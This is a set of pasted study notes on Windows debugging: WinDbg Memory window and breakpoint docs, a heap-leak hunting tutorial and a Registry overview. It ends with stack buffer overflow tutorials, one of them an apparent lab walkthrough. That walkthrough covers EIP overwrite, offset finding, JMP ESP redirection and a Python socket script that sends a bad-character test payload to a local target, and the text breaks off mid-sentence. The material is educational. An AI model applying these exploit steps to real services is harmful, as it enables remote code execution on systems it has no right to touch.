The Memory window displays data in several columns. The column on the left side of the
window shows the beginning address of each line. The remaining columns display the
requested information, from left to right. If you select Bytes in the Display format menu, the
ASCII characters that correspond to these bytes are displayed in the right side of the window.
Note: By default, the Memory window displays virtual memory. This type of memory is the
only type of memory that is available in user mode. In kernel mode, you can use the Memory
Options dialog box to display physical memory and other data spaces. The Memory
Options dialog box is described later in this topic.
In the Memory window, you can do the following:
• To write to memory, select inside the Memory window and type new data. You can
edit only hexadecimal data—you cannot directly edit ASCII and Unicode characters.
Changes take effect as soon as you type new information.
• To see other sections of memory, use the Previous and Next buttons on the Memory
window toolbar, or press the PAGE UP or PAGE DOWN keys. These buttons and keys
display the immediately preceding or following sections of memory. If you request an
invalid page, an error message appears.
• To navigate within the window, use the RIGHT ARROW, LEFT ARROW, UP ARROW, and
DOWN ARROW keys. If you use these keys to move off of the page, a new page is
displayed. Before you use these keys, you should resize the Memory window so that it
does not have scroll bars. This sizing enables you to distinguish between the actual
page edge and the window cutoff.
• To change the memory location that is being viewed, enter a new address into the
address box at the top of the Memory window. Note that the Memory window
refreshes its display while you enter an address, so you could get error messages
before you have completed typing the address. Note: The address that you enter into
the box is interpreted in the current radix. If the current radix is not 16, you should
prefix a hexadecimal address with 0x. To change the default radix, use the n (Set
Number Base) command in the Debugger Command window. The display within the
Memory window itself is not affected by the current radix.
• To change the data type that the window uses to display memory, use the Display
format menu in the Memory window toolbar. Supported data types include short
words, double words, and quad-words; short, long, and quad integers and unsigned
integers; 10-byte, 16-byte, 32-byte, and 64-byte real numbers; ASCII characters;
Unicode characters; and hexadecimal bytes. The display of hexadecimal bytes includes
ASCII characters as well.
The Memory window has a toolbar that contains two buttons, a menu, and a box and has a
shortcut menu with additional commands. To access the menu, select and hold (or right-click)
the title bar or select the icon near the upper-right corner of the window. The toolbar
and shortcut menu contain the following choices:
• (Toolbar only) The address box enables you to specify a new address or offset. The
exact meaning of this box depends on the memory type you are viewing. For example,
if you are viewing virtual memory, the box enables you to specify a new virtual address
or offset.
• (Toolbar only) Display format enables you to select a new display format.
• (Toolbar and menu) Previous (on the toolbar) and Previous page (on the shortcut
menu) cause the previous section of memory to be displayed.
• (Toolbar and menu) Next (on the toolbar) and Next page (on the shortcut menu) cause
the next section of memory to be displayed.
• (Menu only) Dock or Undock causes the window to enter or leave the docked state.
• (Menu only) Move to new dock closes the Memory window and opens it in a new
dock.
• (Menu only) Set as tab-dock target for window type sets the selected Memory
window as the tab-dock target for other Memory windows. All Memory windows that
are opened after one is chosen as the tab-dock target are automatically grouped with
that window in a tabbed collection.
• (Menu only) Always floating causes the window to remain undocked even if it is
dragged to a docking location.
• (Menu only) Move with frame causes the window to move when the WinDbg frame is
moved, even if the window is undocked. For more information about docked, tabbed,
and floating windows, see Positioning the Windows.
• (Menu only) Properties opens the Memory Options dialog box, which is described in
the following section within this topic.
• (Menu only) Help opens this topic in the Debugging Tools for Windows
documentation.
When you select Properties on the shortcut menu, the Memory Options dialog box appears.
In kernel mode, there are six memory types available as tabs in this dialog box: Virtual
Memory, Physical Memory, Bus Data, Control Data, I/O (I/O port information),
and MSR (model-specific register information). Select the tab that corresponds to the
information that you want to access.
Each tab enables you to specify the memory that you want to display:
• In the Virtual Memory tab, in the Offset box, specify the address or offset of the
beginning of the memory range that you want to view.
• In the Physical Memory tab, in the Offset box, specify the physical address of the
beginning of the memory range that you want to view. The Memory window can
display only described, cacheable physical memory. If you want to display physical
memory that has other attributes, use the d* (Display Memory) command or
the !d* extension.
• In the Bus Data tab, in the Bus Data Type menu, specify the bus data type. Then, use
the Bus number, Slot number, and Offset boxes to specify the bus data that you want
to view.
• In the Control Data tab, use the Processor and Offset text boxes to specify the control
data that you want to view.
• In the I/O tab, in the Interface Type menu, specify the I/O interface type. Use the Bus
number, Address space, and Offset boxes to specify the data that you want to view.
• In the MSR tab, in the MSR box, specify the model-specific register that you want to
view.
Each tab also includes a Display format menu. This menu has the same effect as the Display
format menu in the Memory window.
Select OK in the Memory Options dialog box to cause your changes to take effect.
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/memory-window
Command
• Prefer DML
Memory
Source
• Run to cursor
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-notes-etc-preview
Introduction
A memory leak is a time-consuming bug often created by C++ developers. Detecting memory
leaks is often tedious. Things get worse if you did not write the code, or if the code base is
large.
Though there are tools on the market that help with memory leak detection,
most of these tools are not free. I found Windbg to be a powerful, free tool for tracking down
memory leaks. At the very least, it gives us an idea of the code location suspected of causing
the leak. COM interface leaks are out of the scope of this article.
Windbg is a powerful user/kernel space debugger from Microsoft, which can be downloaded
and installed from here.
Using Windbg
2. Add your program EXE/DLL PDB (program database) path to the symbol file path.
3. You also need to configure the operating system's flags to enable user stack traces for
the process which has memory leaks. This is simple, and can be done
with gflags.exe. Gflags.exe is installed during Windbg's installation. This can also be
done from the command line, using the command "gflags.exe /i MemoryLeak.exe
+ust". My program name is Test2.exe; hence, for the demo, I will be
using Test2.exe rather than MemoryLeak.exe. The snapshot below shows the setting of
OS flags for the application Test2.exe.
Once we have configured Windbg for the symbol file path, start the process which is leaking
memory, and attach Windbg to it. The Attach option in Windbg is available under the File
menu, or can be launched using the F6 shortcut. The snapshot below shows the same:
The !heap command of Windbg is used to display heaps. !heap is well documented in the
Windbg help.
I have developed a small program which leaks memory, and will demonstrate further using the
same.
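#include <windows.h>
void AllocateMemory();
int wmain()
{
    while (1)
        AllocateMemory();
    return 0;
}
void AllocateMemory()
{
    int* a = new int[2000];  // 8000 bytes per call, never deleted: this is the leak
    ZeroMemory(a, 8000);
    Sleep(1);
}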
After attaching Windbg to the process, execute the !heap -s command. -s stands for summary.
Below is the output of the !heap -s for the leaking process:
0:001> !heap -s
validate parameters
Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast
-----------------------------------------------------------------------------
00250000 58001062 64 24 24 15 1 1 0 0 L
00260000 58008060 64 12 12 10 1 1 0 0
-----------------------------------------------------------------------------
Let the process execute for some time, then break into the process again and execute
!heap -s again. Shown below is the output of the command:
0:001> !heap -s
validate parameters
Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast
-----------------------------------------------------------------------------
00260000 58008060 64 12 12 10 1 1 0 0
-----------------------------------------------------------------------------
Lines marked in bold show the growing heap. The above snapshot shows a heap with the
handle 00330000 growing.
Execute "!heap -stat -h 00330000" for the growing heap. This command shows the heap
statistics for the growing heap. Shown below is the command's output.
heap @ 00330000
4c 5 - 17c (0.00)
b0 2 - 160 (0.00)
86 2 - 10c (0.00)
50 3 - f0 (0.00)
74 2 - e8 (0.00)
38 4 - e0 (0.00)
48 3 - d8 (0.00)
c4 1 - c4 (0.00)
62 2 - c4 (0.00)
be 1 - be (0.00)
b8 1 - b8 (0.00)
ae 1 - ae (0.00)
ac 1 - ac (0.00)
55 2 - aa (0.00)
a4 1 - a4 (0.00)
The above snapshot shows 0x76c6 blocks of size 1f64 being allocated (marked in bold). Such a
huge number of blocks of the same size makes us suspect that these can be leaked blocks. The
rest of the block allocations do not have growing block numbers.
The next step is to get the address of these blocks. Use the command !heap -flt s 1f64. This
command filters all other blocks of heap and displays the details of blocks having size 1f64.
_HEAP @ 150000
_HEAP @ 250000
_HEAP @ 260000
_HEAP @ 330000
Use any UsrPtr column value from the listed output, and then use the command
!heap -p -a UsrPtr to display the call stack for UsrPtr. I have selected 0143d8c8 marked in bold.
Upon execution of !heap -p -a 0143d8c8, we get the call stack shown below:
Trace: 0025
7c96d6dc ntdll!RtlDebugAllocateHeap+0x000000e1
7c949d18 ntdll!RtlAllocateHeapSlowly+0x00000044
7c91b298 ntdll!RtlAllocateHeap+0x00000e64
102c103e MSVCR90D!_heap_alloc_base+0x0000005e
102cfd76 MSVCR90D!_heap_alloc_dbg_impl+0x000001f6
102cfb2f MSVCR90D!_nh_malloc_dbg_impl+0x0000001f
102cfadc MSVCR90D!_nh_malloc_dbg+0x0000002c
102db25b MSVCR90D!malloc+0x0000001b
4113d8 Test2!AllocateMemory+0x00000028
41145c Test2!wmain+0x0000002c
411a08 Test2!__tmainCRTStartup+0x000001a8
41184f Test2!wmainCRTStartup+0x0000000f
7c816fd7 kernel32!BaseProcessStart+0x00000023
The lines marked in bold show the functions from our code.
Note: Sometimes, it might happen that the "!heap -s" command does not show a growing
heap. In that case, use the "!heap -stat -h" command to list all the heaps with their sizes and
number of blocks. Spot the growing number of blocks, and then use the "!heap -flt s SIZE"
(SIZE = the size of the suspected block) command.
https://www.codeproject.com/Articles/31382/Memory-Leak-Detection-Using-Windbg
Windows Registry
Description of the registry
The Microsoft Computer Dictionary, Fifth Edition, defines the registry as:
A central hierarchical database used in Windows 98, Windows CE, Windows NT, and Windows
2000 used to store information that is necessary to configure the system for one or more
users, applications, and hardware devices.
The Registry contains information that Windows continually references during operation, such
as profiles for each user, the applications installed on the computer and the types of
documents that each can create, property sheet settings for folders and application icons,
what hardware exists on the system, and the ports that are being used.
The Registry replaces most of the text-based .ini files that are used in Windows 3.x and MS-
DOS configuration files, such as the Autoexec.bat and Config.sys. Although the Registry is
common to several Windows operating systems, there are some differences among them. A
registry hive is a group of keys, subkeys, and values in the registry that has a set of supporting
files that contain backups of its data. The supporting files for all hives except
HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config folder on Windows NT 4.0,
Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. The supporting files
for HKEY_CURRENT_USER are in the %SystemRoot%\Profiles\Username folder. The file name
extensions of the files in these folders indicate the type of data that they contain. Also, the lack
of an extension may sometimes indicate the type of data that they contain.
In Windows 98, the registry files are named User.dat and System.dat. In Windows Millennium
Edition, the registry files are named Classes.dat, User.dat, and System.dat.
Note
The following table lists the predefined keys that are used by the system. The maximum size of
a key name is 255 characters.
HKEY_CURRENT_USER    Contains the root of the configuration information for the user who is currently logged on. The user's folders, screen colors, and Control Panel settings are stored here. This information is associated with the user's profile. This key is sometimes abbreviated as HKCU.
HKEY_USERS    Contains all the actively loaded user profiles on the computer. HKEY_CURRENT_USER is a subkey of HKEY_USERS. HKEY_USERS is sometimes abbreviated as HKU.
HKEY_LOCAL_MACHINE    Contains configuration information particular to the computer (for any user). This key is sometimes abbreviated as HKLM.
HKEY_CURRENT_CONFIG    Contains information about the hardware profile that is used by the local computer at system startup.
Note
The registry in 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista is
divided into 32-bit and 64-bit keys. Many of the 32-bit keys have the same names as their 64-
bit counterparts, and vice versa. The default 64-bit version of Registry Editor that is included
with 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista displays the 32-
bit keys under the node HKEY_LOCAL_MACHINE\Software\WOW6432Node. For more
information about how to view the registry on 64-Bit versions of Windows, see How to view
the system registry by using 64-bit versions of Windows.
The following table lists the data types that are currently defined and that are used by
Windows. The maximum size of a value name is as follows:
• Windows Server 2003, Windows XP, and Windows Vista: 16,383 characters
Long values (more than 2,048 bytes) must be stored as files with the file names stored in the
registry. This helps the registry perform efficiently. The maximum size of a value is as follows:
Note
There is a 64K limit for the total size of all values of a key.
Name    Data type    Description
Binary Value    REG_BINARY    Raw binary data. Most hardware component information is stored as binary data and is displayed in Registry Editor in hexadecimal format.
Expandable String Value    REG_EXPAND_SZ    A variable-length data string. This data type includes variables that are resolved when a program or service uses the data.
Multi-String Value    REG_MULTI_SZ    A multiple string. Values that contain lists or multiple values in a form that people can read are generally this type. Entries are separated by spaces, commas, or other marks.
Binary Value    REG_RESOURCE_LIST    A series of nested arrays that is designed to store a resource list that is used by a hardware device driver or one of the physical devices it controls. This data is detected and written in the \ResourceMap tree by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.
Binary Value    REG_RESOURCE_REQUIREMENTS_LIST    A series of nested arrays that is designed to store a device driver's list of possible hardware resources the driver or one of the physical devices it controls can use. The system writes a subset of this list in the \ResourceMap tree. This data is detected by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.
Binary Value    REG_FULL_RESOURCE_DESCRIPTOR    A series of nested arrays that is designed to store a resource list that is used by a physical hardware device. This data is detected and written in the \HardwareDescription tree by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.
None    REG_NONE    Data without any particular type. This data is written to the registry by the system or applications and is displayed in Registry Editor in hexadecimal format as a Binary Value.
Before you edit the registry, export the keys in the registry that you plan to edit, or back up the
whole registry. If a problem occurs, you can then follow the steps in the Restore the
registry section to restore the registry to its previous state. To back up the whole registry, use
the Backup utility to back up the system state. The system state includes the registry, the
COM+ Class Registration Database, and your boot files. For more information about how to
use the Backup utility to back up the system state, see the following articles:
• How to use the backup feature to back up and restore data in Windows Server 2003
To modify registry data, a program must use the registry functions that are defined in Registry
Functions.
Administrators can modify the registry by using Registry Editor (Regedit.exe or Regedt32.exe),
Group Policy, System Policy, Registry (.reg) files, or by running scripts such as VisualBasic script
files.
We recommend that you use the Windows user interface to change your system settings
instead of manually editing the registry. However, editing the registry may sometimes be the
best method to resolve a product issue. If the issue is documented in the Microsoft Knowledge
Base, an article with step-by-step instructions to edit the registry for that issue will be
available. We recommend that you follow those instructions exactly.
Warning
Serious problems might occur if you modify the registry incorrectly by using Registry Editor or
by using another method. These problems might require that you reinstall the operating
system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at
your own risk.
• Change a value
The navigation area of Registry Editor displays folders. Each folder represents a predefined key
on the local computer. When you access the registry of a remote computer, only two
predefined keys appear: HKEY_USERS and HKEY_LOCAL_MACHINE.
Create a Registration Entries (.reg) file that contains the registry changes, and then run the .reg
file on the computer where you want to make the changes. You can run the .reg file manually
or by using a logon script. For more information, see How to add, modify, or delete registry
subkeys and values by using a Registration Entries (.reg) file.
The Windows Script Host lets you run VBScript and JScript scripts directly in the operating
system. You can create VBScript and JScript files that use Windows Script Host methods to
delete, to read, and to write registry keys and values. For more information about these
methods, visit the following Microsoft Web sites:
• RegDelete method
• RegRead method
• RegWrite method
For more information about the WMI Command-Line utility, see A description of the Windows
Management Instrumentation (WMI) command-line utility (Wmic.exe).
You can use the Console Registry Tool for Windows (Reg.exe) to edit the registry. For help with
the Reg.exe tool, type reg /? at the Command Prompt, and then click OK.
To restore the whole registry, restore the system state from a backup. For more information
about how to restore the system state from a backup, see How to use Backup to protect data
and restore files and folders on your computer in Windows XP and Windows Vista.
Note
Backing up the system state also creates updated copies of the registry files in
the %SystemRoot%\Repair folder.
https://docs.microsoft.com/en-us/troubleshoot/windows-server/performance/windows-registry-advanced-users
You can specify the location of a breakpoint by virtual address, module and routine offsets, or
source file and line number (when in source mode). If you put a breakpoint on a routine
without an offset, the breakpoint is activated when that routine is entered.
• A breakpoint can be set on non-executable memory to watch for that location being
read or written to.
If you are debugging more than one process in user mode, the collection of breakpoints
depends on the current process. To view or change a process' breakpoints, you must select the
process as the current process. For more information about the current process,
see Controlling Processes and Threads.
• Use the .bpcmds (Display Breakpoint Commands) command to list all breakpoints
along with the commands that were used to create them.
• Use the bm (Set Symbol Breakpoint) command to set new breakpoints on symbols
that match a specified pattern. A breakpoint set with bm will be associated with an
address (like a bp breakpoint) if the /d switch is included; it will be unresolved (like
a bu breakpoint) if this switch is not included.
• Use the ba (Break on Access) command to set a processor breakpoint, also known as
a data breakpoint. These breakpoints can be triggered when the memory location is
written to, when it is read, when it is executed as code, or when kernel I/O occurs. For
complete details, see Processor Breakpoints (ba Breakpoints).
• Use the bsc (Update Conditional Breakpoint) command to change the condition under
which an existing conditional breakpoint occurs.
In Visual Studio and WinDbg, there are several user interface elements that facilitate
controlling and displaying breakpoints. See Setting Breakpoints in Visual Studio and Setting
Breakpoints in WinDbg.
Each breakpoint has a decimal number called the breakpoint ID associated with it. This number
identifies the breakpoint in various commands.
Breakpoint Commands
You can include a command in a breakpoint that is automatically executed when the
breakpoint is hit. For example, the following command breaks at MyFunction+0x47, writes a
dump file, and then resumes execution.
0:000> bu MyFunction+0x47 ".dump c:\mydump.dmp; g"
Note: If you are controlling the user-mode debugger from the kernel debugger, do not use g
(Go) in the breakpoint command string. The serial interface might be unable to keep up with
this command, and you will be unable to break back into CDB. For more information about this
situation, see Controlling the User-Mode Debugger from the Kernel Debugger.
Number of Breakpoints
In kernel mode, you can use a maximum of 32 software breakpoints. In user mode, you can
use any number of software breakpoints.
The number of processor breakpoints that are supported depends on the target processor
architecture.
Conditional Breakpoints
You can set a breakpoint that is triggered only under certain conditions. For more information
about these kinds of breakpoints, see Setting a Conditional Breakpoint.
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/methods-of-controlling-breakpoints
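#include <string.h>
int main(int argc, char *argv[])
{
    char buffer[64];
    if (argc < 2)
        return 1;
    /* No bounds check: an argument of 64 or more characters overflows buffer. */
    strcpy(buffer, argv[1]);
    return 0;
}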
Stack-based buffer overflow exploits are likely the shiniest and most common form of exploit
for remotely taking over the code execution of a process. These exploits were extremely
common 20 years ago, but since then, a huge amount of effort has gone into mitigating stack-
based overflow attacks by operating system developers, application developers, and hardware
manufacturers, with changes even being made to the standard libraries developers use. Below,
we will explore how stack-based overflows work and detail the mitigation strategies that are
put in place to try to prevent them.
Deep dive on stack-based buffer overflow attacks
On the bright side, while security was not a driving factor in early computer and software
design, engineers realized that changing running instructions in memory was a bad idea, so
even as long ago as the ‘90s, standard hardware and operating systems were doing a good job
of preventing changes to instructional memory. Unfortunately, you don’t really need to change
instructions to change the behavior of a running program, and with a little knowledge,
writeable data memory provides several opportunities and methods for affecting instruction
execution.
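#include <signal.h>
#include <stdio.h>
#include <string.h>
int main(){
    char realPassword[20];
    char givenPassword[20];
    strncpy(realPassword, "ddddddddddddddd", 20);  /* the expected password */
    gets(givenPassword);                           /* unbounded read: the bug */
    if (0 == strncmp(givenPassword, realPassword, 20)){
        printf("SUCCESS!\n");
    }else{
        printf("FAILURE!\n");
    }
    raise(SIGINT);                                 /* stop here under the debugger */
    printf("givenPassword: %s\n", givenPassword);
    printf("realPassword: %s\n", realPassword);
    return 0;
}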
If you don’t know the C programming language, that’s fine. The interesting thing about this
program is that it creates two buffers in memory called realPassword and givenPassword as
local variables. Each buffer has space for 20 characters. When we run the program, space for
these local variables is created in-memory and specifically stored on the stack with all other
local variables (and some other stuff). The stack is a very structured, sequential memory space,
so the relative distance between any two local variables in-memory is guaranteed to be
relatively small. After this program creates the variables, it populates the realPassword value
with a string, then prompts the user for a password and copies the provided password into
the givenPassword value. Once it has both passwords, it compares them. If they match, it
prints “SUCCESS!” If not, it prints “FAILURE!”
msfuser@ubuntu:~$ ./example.elf
test
FAILURE!
givenPassword: test
realPassword: ddddddddddddddd
This is exactly as we’d expect. The password we entered does not match the expected
password. There is a catch here: The programmer (me) made several really bad mistakes,
which we will talk about later. Before we cover that, though, let’s open a debugger and peek
into memory to see what the stack looks like in memory while the program is executing:
(gdb) run
aaaaaaaaaaaaaaaa
FAILURE!
(gdb)
At this point, the program has taken in the data and compared it, but I added an interrupt in
the code to stop it before exiting so we could “look” at the stack. Debuggers let us see what
the program is doing and what the memory looks like on a running basis. In this case, we are
using the GNU Debugger (GDB). The GDB command ‘info frame’ allows us to find the location
in memory of the local variables, which will be on the stack:
source language c.
Saved registers:
rip at 0x7fffffffddd8
(gdb)
Now that we know where the local variables are, we can print that area of memory:
As mentioned, the stack is sequentially stored data. If you know ASCII, then you know the
letter ‘a’ is represented in memory by the value 0x61 and the letter ‘d’ is 0x64. You can see
above that they are right next to each other in memory. The realPassword buffer is right after
the givenPassword buffer.
Now, let’s talk about the mistakes that the programmer (me) made. First, developers should
never, ever, ever use the gets function because it does not check to make sure that the size of
the data it reads in matches the size of the memory location it uses to save the data. It just
blindly reads the text and dumps it into memory. There are many functions that do the exact
same thing—these are known as unbounded functions because developers cannot predict
when they will stop reading from or writing to memory. Microsoft even has a web page
documenting what it calls “banned” functions, which includes these unbounded functions.
Every developer should know these functions and avoid them, and every project should
automatically audit source code for them. These functions all date from a period where
security was not as imperative as it is today. These functions must continue to be supported
because pulling support would break many legacy programs, but they should not be used in
any new programs and should be removed during maintenance of old programs.
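As a rough illustration of what "automatically audit source code" could look like, here is a minimal Python 3 sketch. The short BANNED tuple and the helper name find_banned_calls are assumptions made for this example; a real audit would use the complete banned list and a proper C parser, since this naive text match also fires inside comments and string literals.

```python
import re

# Assumed, deliberately short list; a real audit would use the full banned list.
BANNED = ("gets", "strcpy", "strcat", "sprintf")

# \b keeps "gets" from matching inside "fgets"; \s* allows "strcpy (dst, src)".
CALL_RE = re.compile(r"\b(" + "|".join(BANNED) + r")\s*\(")


def find_banned_calls(source):
    """Return (line_number, function_name) for every banned call in C source text."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        for match in CALL_RE.finditer(line):
            hits.append((number, match.group(1)))
    return hits


# Hypothetical snippet in the spirit of the password example above.
SAMPLE = '''
char givenPassword[20];
gets(givenPassword);
fgets(givenPassword, sizeof givenPassword, stdin);
'''

for line_number, name in find_banned_calls(SAMPLE):
    print("line %d: call to %s()" % (line_number, name))
```

Only the gets call is reported here; the bounded fgets call on the next line is left alone.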
We have looked at the stack, noticed that the buffers are located consecutively in memory,
and talked about why gets is a bad function. Let’s now abuse gets and see whether we can
hack the planet program. Since we know gets has a problem with reading more than it should,
the first thing to try is to give it more data than the buffer can hold. The buffers are 20
characters, so let’s start with 30 characters:
(gdb) run
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
FAILURE!
givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
realPassword: ddddddddddddddd
source language c.
Saved registers:
rip at 0x7fffffffddd8
(gdb) x/200x 0x7fffffffddd0
We can see clearly that there are 30 instances of ‘a’ in memory, despite us only specifying
space for 20 characters. We have overflowed the buffer, but not enough to do anything. Let’s
keep going and try 40 instances of ‘a’:
(gdb) run
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
FAILURE!
givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
realPassword: aaaaaaaa
The first thing to notice is that we went far enough to pass through the allotted space
for givenPassword and managed to alter the value of realPassword, which is a huge success.
We did not alter it enough to fool the program, though. Since we are comparing 20 characters
and we wrote eight characters to the realPassword buffer, we need to write 12 more
characters. So, let’s try again, but with 52 instances of ‘a’ this time:
(gdb) run
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
SUCCESS!
givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
realPassword: aaaaaaaaaaaaaaaaaaaa
source language c.
Saved registers:
rip at 0x7fffffffddd8
Success! We overflowed the buffer for givenPassword and the data went straight
into realPassword, so that we were able to alter the realPassword buffer to whatever we
wanted before the check took place. This is an example of a buffer (or stack) overflow attack.
In this case, we used it to alter variables within a program, but it can also be used to alter
metadata used to track program execution.
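The arithmetic behind the three runs can be replayed without a debugger. The following Python 3 sketch models the two buffers as one block of memory; the 32-byte distance between them is inferred from the 40-character run (eight characters spilled into realPassword), and the placeholder secret of fifteen ‘d’ characters only mirrors what the output above prints. Both are assumptions about the layout, not values read from the program.

```python
# Simulated stack memory holding two adjacent buffers.
GIVEN_OFFSET = 0    # start of givenPassword
REAL_OFFSET = 32    # start of realPassword (assumed, inferred from the 40-'a' run)
COMPARE_LEN = 20    # number of characters the program compares


def fresh_memory():
    """Return 64 bytes of memory with a placeholder real password in place."""
    memory = bytearray(64)
    secret = b"d" * 15  # placeholder, mirrors the 'ddd...' seen in the output
    memory[REAL_OFFSET:REAL_OFFSET + len(secret)] = secret
    return memory


def unsafe_gets(memory, offset, data):
    """Copy data plus a terminating NUL with no bounds check, like gets()."""
    payload = data + b"\x00"
    memory[offset:offset + len(payload)] = payload


def c_string(memory, offset):
    """Read bytes from offset up to (not including) the first NUL."""
    end = memory.index(0, offset)
    return bytes(memory[offset:end])


def check_password(user_input):
    """Return (success, resulting realPassword) for one simulated run."""
    memory = fresh_memory()
    unsafe_gets(memory, GIVEN_OFFSET, user_input)
    given = c_string(memory, GIVEN_OFFSET)[:COMPARE_LEN]
    real = c_string(memory, REAL_OFFSET)[:COMPARE_LEN]
    return given == real, c_string(memory, REAL_OFFSET)


for count in (30, 40, 52):
    ok, real = check_password(b"a" * count)
    print(count, "SUCCESS!" if ok else "FAILURE!", real)
```

With 52 characters, the first 32 fill the gap up to realPassword and the remaining 20 replace it entirely, which is why the comparison of the first 20 characters succeeds.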
https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/
https://owasp.org/www-community/vulnerabilities/Buffer_Overflow
Memory Layout
Credits: GeeksforGeeks
The Stack
The stack is a piece of the process memory, a data structure that works LIFO (Last in first out).
A stack gets allocated by the OS, for each thread (when the thread is created). When the
thread ends, the stack is cleared as well. The size of the stack is defined when it gets created
and doesn’t change.
Source: Wikipedia
A stack frame is a frame of data that gets pushed onto the stack. In the case of a call stack, a
stack frame represents a function call and its argument data. In a typical 32-bit x86 call, the
caller pushes the arguments first, the CALL instruction then pushes the return address, and the
called function finally saves the old base pointer and reserves space for its local variables.
Registers
• EAX: Accumulator used for performing calculations, and used to store return values
from function calls. Basic operations such as add, subtract, compare use this general-
purpose register
• EBX: Base (does not have anything to do with base pointer). It has no dedicated purpose
and can be used to store data.
• EDX: Data. This is an extension of the EAX register. It allows for more complex
calculations (multiply, divide) by allowing extra data to be stored to facilitate those
calculations.
• EDI: Destination Index points to the location where the result of data operation is
stored
Credits: Acunetix
If we overwrite the saved return address, the value we supply is loaded into EIP when the
function returns, and the program executes the instructions at that address. We can therefore
put our shellcode on the stack, overwrite the return address with the address where the
shellcode starts, and the program will execute the shellcode.
1. Write past the end of the array buffer and overwrite the EIP register to crash the program.
2. Find the offset of the payload after which the EIP is overwritten.
4. Find the address of the JMP ESP opcode so that program flow can be redirected to the
stack.
5. Overwrite return address at EIP with the address of JMP ESP.
Exploiting
We create a long string using the command python -c "print 'A'*300" and then send it as input
to the server.
Crashed application
We restart the application with Immunity Debugger attached and send the same payload once
more. We can see that the application crashed and the EIP register is overwritten with 41 (A in
hexadecimal).
Finding Offset
Now that we know that we can overwrite the EIP register we need to find out the exact
number of bytes in the payload after which the EIP gets overwritten. To find this we use a tool
called msf-pattern_create to create a unique non-repeating string and send it as a payload.
After the application crashes, we note the value of EIP and use msf-pattern_offset to calculate
the exact value.
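To make the idea concrete, here is a small Python 3 sketch of how such a pattern can be generated and searched. It follows the Upper/lower/digit scheme (Aa0Aa1Aa2...); the function names and the default length of 1000 are choices made for this example, and this is not the Metasploit implementation itself.

```python
import string
import struct


def pattern_create(length):
    """Build a cyclic pattern of Upper/lower/digit triples: Aa0Aa1Aa2..."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    # Requested length exceeds the 20280 unique characters available.
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length=1000):
    """Return the offset of the 4 bytes found in EIP, or -1 if they are absent.

    eip_value is the 32-bit number shown by the debugger. Memory is little
    endian, so it is packed back into the byte order that was actually sent.
    """
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)


print(pattern_create(20))
```

Because every 4-character window of the pattern occurs only once, the value that lands in EIP identifies exactly one position in the payload.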
import socket

host = "192.168.0.107"
port = 31337

# Every byte value except the known bad characters \x00 and \x0a
char = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# EIP Writing Pattern
pattern = "A"*146 + "BBBB" + char + "\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)
# print out what we received
print "Received: {0}".format(data)
client.close() # Close the Connection
After sending this we check the value of the stack (right-click on the ESP register and select
Follow in Dump option).
We can verify that EIP is under our control
As all the characters that we have sent are present, we can confirm that there are no bad
characters other than \x00 and \x0A. If there were a bad character, it would have been replaced
